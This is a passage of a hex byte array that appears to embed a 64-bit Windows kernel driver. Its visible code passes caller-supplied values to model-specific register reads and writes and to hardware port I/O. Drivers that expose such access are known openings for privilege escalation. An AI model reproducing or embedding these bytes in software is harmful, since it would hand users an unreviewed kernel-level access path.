0x2E, 0x0D, 0x0D, 0x0A, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0xF1, 0x3C, 0x9B, 0x47, 0x90, 0x52, 0xC8, 0x47, 0x90, 0x52, 0xC8, 0x47, 0x90, 0x52, 0xC8, 0x47, 0x90, 0x53, 0xC8, 0x5C, 0x90, 0x52, 0xC8, 0x4E, 0xE8, 0xC1, 0xC8, 0x42, 0x90, 0x52, 0xC8, 0x4E, 0xE8, 0xD1, 0xC8, 0x41, 0x90, 0x52, 0xC8, 0x4E, 0xE8, 0xDB, 0xC8, 0x46, 0x90, 0x52, 0xC8, 0x4E, 0xE8, 0xC7, 0xC8, 0x43, 0x90, 0x52, 0xC8, 0x4E, 0xE8, 0xC6, 0xC8, 0x46, 0x90, 0x52, 0xC8, 0x4E, 0xE8, 0xC3, 0xC8, 0x46, 0x90, 0x52, 0xC8, 0x52, 0x69, 0x63, 0x68, 0x47, 0x90, 0x52, 0xC8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x45, 0x00, 0x00, 0x64, 0x86, 0x06, 0x00, 0x3B, 0x46, 0x34, 0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF0, 0x00, 0x22, 0x00, 0x0B, 0x02, 0x09, 0x00, 0x00, 0x42, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x64, 0x80, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00, 0x06, 0x00, 0x01, 0x00, 0x06, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA0, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x55, 0x5C, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x84, 0x80, 0x00, 0x00, 0x3C, 0x00, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x50, 0x03, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0xF0, 0x00, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x40, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF0, 0x50, 0x00, 0x00, 0x1C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, 0x06, 0x3A, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x3C, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x68, 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x8C, 0x04, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, 0x2E, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x40, 0x04, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0xC8, 0x2E, 0x70, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0xF0, 0x00, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, 0x49, 0x4E, 0x49, 0x54, 0x00, 0x00, 0x00, 0x00, 0x0E, 0x04, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x4A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0xE2, 0x2E, 0x72, 0x73, 0x72, 0x63, 0x00, 0x00, 0x00, 0x50, 0x03, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x53, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x8B, 0xD9, 0x4C, 0x8D, 0x44, 0x24, 0x48, 0x48, 0x8D, 0x54, 0x24, 0x38, 0x48, 0x8D, 0x4C, 0x24, 0x40, 0x45, 0x33, 0xC9, 0xFF, 0x15, 0x4F, 0x40, 0x00, 0x00, 0x44, 0x8B, 0x5C, 0x24, 0x40, 0x41, 0x83, 0xFB, 0x05, 0x75, 0x10, 0x83, 0x7C, 0x24, 0x38, 0x00, 0x75, 0x16, 0x8B, 0x43, 0x24, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xC3, 0x41, 0x83, 0xFB, 0x06, 0x75, 0x10, 0x83, 0x7C, 0x24, 0x38, 0x04, 0x74, 0x16, 0x8B, 0x43, 0x20, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xC3, 0x41, 0x83, 0xFB, 0x0A, 0x75, 0xF1, 0x83, 0x7C, 0x24, 0x38, 0x00, 0x75, 0xEA, 0x81, 0x7C, 0x24, 0x48, 0xBB, 0x37, 0x00, 0x00, 0x72, 0xE0, 0x8B, 0x43, 0x28, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x40, 0x53, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x8B, 0xD9, 0x4C, 0x8D, 0x44, 0x24, 0x48, 0x48, 0x8D, 0x54, 0x24, 0x38, 0x48, 0x8D, 0x4C, 0x24, 0x40, 0x45, 0x33, 0xC9, 0xFF, 0x15, 0xCF, 0x3F, 0x00, 0x00, 0x44, 0x8B, 0x5C, 0x24, 0x40, 0x41, 0x83, 0xFB, 0x06, 0x75, 0x11, 0x83, 0x7C, 0x24, 0x38, 0x04, 0x74, 0x17, 0x48, 0x8B, 0x43, 0x08, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xC3, 0x41, 0x83, 0xFB, 0x0A, 0x75, 0xF0, 0x83, 0x7C, 0x24, 0x38, 0x00, 0x75, 0xE9, 0x81, 0x7C, 0x24, 0x48, 0xBB, 0x37, 0x00, 0x00, 0x72, 0xDF, 0x48, 0x8B, 0x03, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x40, 0x53, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x8B, 0xD9, 0x4C, 0x8D, 0x44, 0x24, 0x48, 0x48, 0x8D, 0x54, 0x24, 0x38, 0x48, 0x8D, 0x4C, 0x24, 0x40, 0x45, 0x33, 0xC9, 0xFF, 0x15, 0x5F, 0x3F, 0x00, 0x00, 0x44, 0x8B, 0x5C, 0x24, 0x40, 0x41, 0x83, 0xFB, 0x06, 0x75, 0x0F, 0x83, 0x7C, 0x24, 0x38, 0x04, 0x74, 0x15, 0x33, 0xC0, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xC3, 0x41, 0x83, 0xFB, 0x0A, 0x75, 0xF2, 0x83, 0x7C, 0x24, 0x38, 0x00, 0x75, 0xEB, 0x81, 0x7C, 0x24, 0x48, 0xBB, 0x37, 0x00, 0x00, 0x72, 0xE1, 0x48, 0x8B, 0x43, 0x20, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x7C, 0x24, 0x10, 0x8B, 0xDA, 0x45, 0x33, 0xDB, 0x4C, 0x8D, 0x05, 0xCA, 0x4F, 0x00, 0x00, 0x48, 0x8D, 0x3D, 0xC3, 0x52, 0x00, 0x00, 0x0F, 0x1F, 0x00, 0x4D, 0x8B, 0x48, 0xF0, 0x49, 0x3B, 0xC9, 0x72, 0x19, 0x45, 0x8B, 0x10, 0x4D, 0x03, 0xD1, 0x49, 0x3B, 0xCA, 0x73, 0x0E, 0x48, 0x8D, 0x14, 0x19, 0x49, 0x3B, 0xD1, 0x72, 0x05, 0x49, 0x3B, 0xD2, 0x76, 0x19, 0x49, 0x83, 0xC0, 0x18, 0x41, 0xFF, 0xC3, 0x4C, 0x3B, 0xC7, 0x7C, 0xD2, 0x33, 0xC0, 0x48, 0x8B, 0x5C, 0x24, 0x08, 0x48, 0x8B, 0x7C, 0x24, 0x10, 0xC3, 0x48, 0x8B, 0x5C, 0x24, 0x08, 0x48, 0x8B, 0x7C, 0x24, 0x10, 0x49, 0x63, 0xC3, 0x48, 0x8D, 0x0C, 0x40, 0x48, 0x8D, 0x05, 0x5D, 0x4F, 0x00, 0x00, 0x48, 0x8D, 0x04, 0xC8, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x83, 0xEC, 0x38, 0x41, 0x83, 0xE0, 0x07, 0x83, 0xE2, 0x1F, 0xC7, 0x44, 0x24, 0x28, 0x04, 0x00, 0x00, 0x00, 0x41, 0xC1, 0xE0, 0x05, 0x44, 0x89, 0x4C, 0x24, 0x20, 0x4C, 0x8B, 0x4C, 0x24, 0x60, 0x44, 0x0B, 0xC2, 0x8B, 0xD1, 0xB9, 0x04, 0x00, 0x00, 0x00, 0xFF, 0x15, 0xDF, 0x3D, 0x00, 0x00, 0x48, 0x83, 0xC4, 0x38, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x83, 0xEC, 0x38, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x41, 0x83, 0xE0, 0x07, 0x83, 0xE2, 0x1F, 0x41, 0xC1, 0xE0, 0x05, 0xC7, 0x44, 0x24, 0x28, 0x04, 0x00, 0x00, 0x00, 0x44, 0x89, 0x4C, 0x24, 0x20, 0x44, 0x0B, 0xC2, 0x8B, 0xD1, 0x4C, 0x8D, 0x4C, 0x24, 0x60, 0xB9, 0x04, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x60, 0xFF, 0x15, 0x9D, 0x3D, 0x00, 0x00, 0x48, 0x83, 0xC4, 0x38, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48, 0x81, 0xEC, 0x80, 0x00, 0x00, 0x00, 0x49, 0x8B, 0xF8, 0x45, 0x33, 0xC0, 0x48, 0x8B, 0xF1, 0x48, 0x8D, 0x4C, 0x24, 0x68, 0x41, 0x8D, 0x50, 0x01, 0x41, 0x8B, 0xD9, 0xFF, 0x15, 0x8B, 0x3D, 0x00, 0x00, 0x48, 0x8D, 0x44, 0x24, 0x68, 0x4C, 0x8D, 0x5C, 0x24, 0x58, 0x4C, 0x89, 0x5C, 0x24, 0x40, 0x48, 0x89, 0x44, 0x24, 0x38, 0x8B, 0x84, 0x24, 0xB8, 0x00, 0x00, 0x00, 0xC6, 0x44, 0x24, 0x30, 0x00, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8B, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x44, 0x8B, 0xCB, 0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD6, 0xB9, 0x04, 0xC0, 0x32, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0xFF, 0x15, 0xCE, 0x3D, 0x00, 0x00, 0x48, 0x8B, 0xF8, 0x48, 0x85, 0xC0, 0x75, 0x07, 0xB8, 0x9A, 0x00, 0x00, 0xC0, 0xEB, 0x71, 0x48, 0x8B, 0xD0, 0x48, 0x8B, 0xCE, 0xFF, 0x15, 0x93, 0x3D, 0x00, 0x00, 0x8B, 0xD8, 0x3D, 0x03, 0x01, 0x00, 0x00, 0x75, 0x5A, 0x48, 0x8D, 0x44, 0x24, 0x50, 0x48, 0x8D, 0x4C, 0x24, 0x68, 0x45, 0x33, 0xC9, 0x45, 0x33, 0xC0, 0x33, 0xD2, 0x48, 0xC7, 0x44, 0x24, 0x50, 0xC0, 0xBD, 0xF0, 0xFF, 0x48, 0x89, 0x44, 0x24, 0x20, 0xFF, 0x15, 0x3C, 0x3D, 0x00, 0x00, 0x8B, 0xD8, 0x3D, 0x02, 0x01, 0x00, 0x00, 0x75, 0x27, 0x48, 0x8B, 0xCF, 0xFF, 0x15, 0x02, 0x3D, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x68, 0x45, 0x33, 0xC9, 0x45, 0x33, 0xC0, 0x33, 0xD2, 0x48, 0xC7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0xFF, 0x15, 0x0E, 0x3D, 0x00, 0x00, 0xEB, 0x04, 0x8B, 0x5C, 0x24, 0x58, 0x8B, 0xC3, 0x4C, 0x8D, 0x9C, 0x24, 0x80, 0x00, 0x00, 0x00, 0x49, 0x8B, 0x5B, 0x10, 0x49, 0x8B, 0x73, 0x18, 0x49, 0x8B, 0xE3, 0x5F, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x4C, 0x8B, 0xDC, 0x49, 0x89, 0x5B, 0x10, 0x49, 0x89, 0x73, 0x18, 0x57, 0x48, 0x81, 0xEC, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x05, 0x56, 0x4D, 0x00, 0x00, 0x48, 0x33, 0xC4, 0x48, 0x89, 0x84, 0x24, 0xF0, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x15, 0x44, 0xEC, 0xFF, 0xFF, 0x48, 0x8B, 0xF9, 0x48, 0x8D, 0x4C, 0x24, 0x70, 0x48, 0x8B, 0x82, 0x80, 0x49, 0x00, 0x00, 0x33, 0xF6, 0x48, 0x89, 0x01, 0x48, 0x8B, 0x82, 0x88, 0x49, 0x00, 0x00, 0x48, 0x89, 0x74, 0x24, 0x48, 0x48, 0x89, 0x41, 0x08, 0x48, 0x8B, 0x82, 0x90, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x10, 0x48, 0x8B, 0x82, 0x98, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x18, 0x48, 0x8B, 0x82, 0xA0, 0x49, 0x00, 0x00, 0x49, 0x8D, 0x4B, 0x88, 0x48, 0x89, 0x01, 0x48, 0x8B, 0x82, 0xA8, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x08, 0x48, 0x8B, 0x82, 0xB0, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x10, 0x48, 0x8B, 0x82, 0xB8, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x18, 0x48, 0x8B, 0x82, 0xC0, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x20, 0x48, 0x8B, 0x82, 0xD0, 0x49, 0x00, 0x00, 0x49, 0x8D, 0x4B, 0xB0, 0x48, 0x89, 0x01, 0x48, 0x8B, 0x82, 0xD8, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x08, 0x48, 0x8B, 0x82, 0xE0, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x10, 0x48, 0x8B, 0x82, 0xE8, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x18, 0x48, 0x8B, 0x82, 0xF0, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x20, 0x48, 0x8B, 0x82, 0xF8, 0x49, 0x00, 0x00, 0x48, 0x89, 0x41, 0x28, 0x8B, 0x82, 0x00, 0x4A, 0x00, 0x00, 0x89, 0x41, 0x30, 0x0F, 0xB7, 0x82, 0x04, 0x4A, 0x00, 0x00, 0x48, 0x8D, 0x54, 0x24, 0x70, 0x66, 0x89, 0x41, 0x34, 0x48, 0x8D, 0x4C, 0x24, 0x50, 0xFF, 0x15, 0x8F, 0x3B, 0x00, 0x00, 0x4C, 0x8D, 0x5C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x50, 0x4C, 0x89, 0x5C, 0x24, 0x30, 0x8D, 0x56, 0x04, 0x41, 0xB9, 0x40, 0x9C, 0x00, 0x00, 0x48, 0x8B, 0xCF, 0xC6, 0x44, 0x24, 0x28, 0x01, 0x89, 0x74, 0x24, 0x20, 0xFF, 0x15, 0xD5, 0x3B, 0x00, 0x00, 0x8B, 0xD8, 0x85, 0xC0, 0x0F, 0x88, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x40, 0x45, 0x33, 0xC9, 0x45, 0x33, 0xC0, 0x33, 0xD2, 0xFF, 0x15, 0xA0, 0x3B, 0x00, 0x00, 0x83, 0x7C, 0x24, 0x40, 0x05, 0x48, 0x8D, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x94, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x60, 0x48, 0x0F, 0x42, 0xD0, 0xFF, 0x15, 0x24, 0x3B, 0x00, 0x00, 0x48, 0x8D, 0x54, 0x24, 0x50, 0x48, 0x8D, 0x4C, 0x24, 0x60, 0xFF, 0x15, 0x74, 0x3B, 0x00, 0x00, 0x8B, 0xD8, 0x85, 0xC0, 0x79, 0x12, 0x48, 0x8B, 0x4C, 0x24, 0x48, 0x48, 0x85, 0xC9, 0x74, 0x51, 0xFF, 0x15, 0x06, 0x3B, 0x00, 0x00, 0xEB, 0x49, 0x48, 0x8D, 0x05, 0x7D, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x0D, 0x0A, 0x4F, 0x00, 0x00, 0x48, 0x89, 0x87, 0xE0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x87, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x70, 0x48, 0x8D, 0x05, 0xBD, 0x2E, 0x00, 0x00, 0x48, 0x89, 0x47, 0x68, 0x48, 0x8D, 0x05, 0xE6, 0x4B, 0x00, 0x00, 0x66, 0x90, 0x89, 0x70, 0xFC, 0x89, 0x30, 0x48, 0x89, 0x70, 0x04, 0x89, 0x70, 0x0C, 0x48, 0x83, 0xC0, 0x18, 0x48, 0x3B, 0xC1, 0x7C, 0xEB, 0x8B, 0xC3, 0x48, 0x8B, 0x8C, 0x24, 0xF0, 0x00, 0x00, 0x00, 0x48, 0x33, 0xCC, 0xE8, 0x49, 0x30, 0x00, 0x00, 0x4C, 0x8D, 0x9C, 0x24, 0x00, 0x01, 0x00, 0x00, 0x49, 0x8B, 0x5B, 0x18, 0x49, 0x8B, 0x73, 0x20, 0x49, 0x8B, 0xE3, 0x5F, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x8B, 0xC4, 0x48, 0x89, 0x50, 0x10, 0x48, 0x89, 0x48, 0x08, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xEC, 0xF0, 0x02, 0x00, 0x00, 0x0F, 0x29, 0x70, 0xB8, 0x0F, 0x29, 0x78, 0xA8, 0x44, 0x0F, 0x29, 0x40, 0x98, 0x4C, 0x8B, 0xF2, 0x45, 0x33, 0xFF, 0x44, 0x89, 0x7A, 0x30, 0x4C, 0x89, 0x7A, 0x38, 0x48, 0x8B, 0x92, 0xB8, 0x00, 0x00, 0x00, 0x4D, 0x8B, 0x6E, 0x18, 0x80, 0x3A, 0x0E, 0x0F, 0x85, 0x6B, 0x2C, 0x00, 0x00, 0x8B, 0x42, 0x18, 0x3D, 0x00, 0x25, 0x40, 0x9C, 0x0F, 0x87, 0x31, 0x1A, 0x00, 0x00, 0x3D, 0x00, 0x25, 0x40, 0x9C, 0x0F, 0x84, 0x7C, 0x19, 0x00, 0x00, 0x05, 0x00, 0xDC, 0xBF, 0x63, 0x3D, 0xA8, 0x00, 0x00, 0x00, 0x0F, 0x87, 0x3A, 0x2C, 0x00, 0x00, 0x48, 0x8D, 0x3D, 0xD4, 0xE9, 0xFF, 0xFF, 0x0F, 0xB6, 0x84, 0x07, 0x08, 0x43, 0x00, 0x00, 0x8B, 0x8C, 0x87, 0xA0, 0x42, 0x00, 0x00, 0x48, 0x03, 0xCF, 0xFF, 0xE1, 0x83, 0x7A, 0x08, 0x08, 0x72, 0x40, 0x83, 0x7A, 0x10, 0x04, 0x72, 0x3A, 0x41, 0x8B, 0x4D, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x8B, 0xC8, 0x48, 0xC1, 0xE8, 0x20, 0x41, 0x89, 0x4D, 0x00, 0x41, 0x89, 0x45, 0x04, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0xE1, 0x2B, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xD0, 0x2B, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x72, 0x4C, 0x83, 0x7A, 0x10, 0x0C, 0x72, 0x46, 0x45, 0x8B, 0x45, 0x04, 0x45, 0x8B, 0x4D, 0x08, 0x49, 0x8B, 0xC0, 0x48, 0xC1, 0xE0, 0x20, 0x49, 0x0B, 0xC1, 0x48, 0x8B, 0xD0, 0x48, 0xC1, 0xEA, 0x20, 0x41, 0x8B, 0x4D, 0x00, 0x0F, 0x30, 0x45, 0x89, 0x4D, 0x00, 0x45, 0x89, 0x45, 0x04, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0x7E, 0x2B, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x6D, 0x2B, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x72, 0x2B, 0x83, 0x7A, 0x10, 0x04, 0x72, 0x25, 0x41, 0x8B, 0x55, 0x00, 0xEC, 0x0F, 0xB6, 0xC0, 0x41, 0x89, 0x45, 0x00, 0x41, 0xC7, 0x45, 0x04, 0x21, 0x43, 0x65, 0x87, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xE9, 0x3C, 0x2B, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x2B, 0x2B, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x72, 0x2C, 0x83, 0x7A, 0x10, 0x04, 0x72, 0x26, 0x41, 0x8B, 0x55, 0x00, 0x66, 0xED, 0x0F, 0xB7, 0xC0, 0x41, 0x89, 0x45, 0x00, 0x41, 0xC7, 0x45, 0x04, 0x21, 0x43, 0x65, 0x87, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xE9, 0xF9, 0x2A, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xE8, 0x2A, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x72, 0x28, 0x83, 0x7A, 0x10, 0x04, 0x72, 0x22, 